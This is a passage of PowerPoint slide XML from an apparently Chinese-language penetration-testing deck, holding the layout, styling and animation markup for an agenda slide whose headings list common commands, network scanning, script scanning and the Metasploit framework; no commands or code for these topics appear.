            <p:cNvPr id="47" name="文本框 9"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="927951"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>01</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="48" name="组合 47"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="2471202"/>
            <a:ext cx="1192345" cy="672217"/>
            <a:chOff x="2215144" y="1952311"/>
            <a:chExt cx="1244730" cy="924318"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="49" name="平行四边形 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="2033848"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="50" name="文本框 10"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="1952311"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>02</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="51" name="组合 50"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4606151" y="3407000"/>
            <a:ext cx="1192345" cy="666115"/>
            <a:chOff x="2215144" y="3018134"/>
            <a:chExt cx="1244730" cy="915925"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="52" name="平行四边形 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="3084852"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="53" name="文本框 11"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="3018134"/>
              <a:ext cx="1066799" cy="915925"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>03</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="54" name="组合 53"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4596626" y="4316986"/>
            <a:ext cx="1192345" cy="677512"/>
            <a:chOff x="2215144" y="4047039"/>
            <a:chExt cx="1244730" cy="931598"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="55" name="平行四边形 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2215144" y="4135856"/>
              <a:ext cx="1120898" cy="842781"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>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65">
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="56" name="文本框 12"/>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2393075" y="4047039"/>
              <a:ext cx="1066799" cy="915927"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" altLang="zh-CN" sz="3735" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
                </a:rPr>
                <a:t>04</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="3735" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Impact" panose="020B0806030902050204" pitchFamily="34" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="60" name="组合 59"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="1582798"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="953426"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="61" name="矩形 60"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4615667" y="1005461"/>
              <a:ext cx="3228975" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.1 常用命令</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="62" name="平行四边形 61"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="953426"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="158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91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="63" name="组合 62"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="2508336"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="1647579"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="64" name="矩形 63"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644505" y="1715136"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.2 网络扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="65" name="平行四边形 64"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="1647579"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="66" name="组合 65"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5511822" y="3433872"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="2341731"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="67" name="矩形 66"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4644506" y="2450133"/>
              <a:ext cx="2827146" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>2</a:t>
              </a:r>
              <a:r>
                <a:rPr sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:sym typeface="+mn-ea"/>
                </a:rPr>
                <a:t>.3 脚本扫描</a:t>
              </a:r>
              <a:endParaRPr sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:sym typeface="+mn-ea"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="68" name="平行四边形 67"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="2341731"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="69" name="组合 68"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5502297" y="4359409"/>
            <a:ext cx="5143000" cy="612920"/>
            <a:chOff x="4315150" y="3035884"/>
            <a:chExt cx="3857250" cy="540057"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="70" name="矩形 69"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4623073" y="3097846"/>
              <a:ext cx="2827147" cy="405646"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="15875">
              <a:noFill/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="tx1">
                      <a:lumMod val="75000"/>
                      <a:lumOff val="25000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                  <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                </a:rPr>
                <a:t>2.4 Metasploit框架</a:t>
              </a:r>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" charset="-122"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="71" name="平行四边形 70"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4315150" y="3035884"/>
              <a:ext cx="3857250" cy="540057"/>
            </a:xfrm>
            <a:prstGeom prst="parallelogram">
              <a:avLst>
                <a:gd name="adj" fmla="val 48207"/>
              </a:avLst>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="15875">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lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US" sz="2135" b="1">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="81" name="等腰三角形 80"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-125866" y="4437500"/>
            <a:ext cx="3458403" cy="2584187"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent5">
              <a:alpha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p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="82" name="等腰三角形 81"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1348800" y="5033297"/>
            <a:ext cx="2607127" cy="1948097"/>
          </a:xfrm>
          <a:prstGeom prst="triangle">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent4">
              <a:alpha val="7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p>
        </p:txBody>
      </p:sp>
    </p:spTree>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81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="7" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="8" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="9" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="81"/>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82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="14" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="82"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="15" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="16" presetID="47" presetClass="entr" presetSubtype="0" fill="hold" grpId="0" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="17" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="fade">
                                      <p:cBhvr>
                                        <p:cTn id="18" dur="1000"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="20" dur="1000" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="15"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y-.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="21" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="22" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="23" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="24" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="25" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="45"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="26" presetID="2" presetClass="entr" presetSubtype="8" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="27" dur="1" fill="hold">
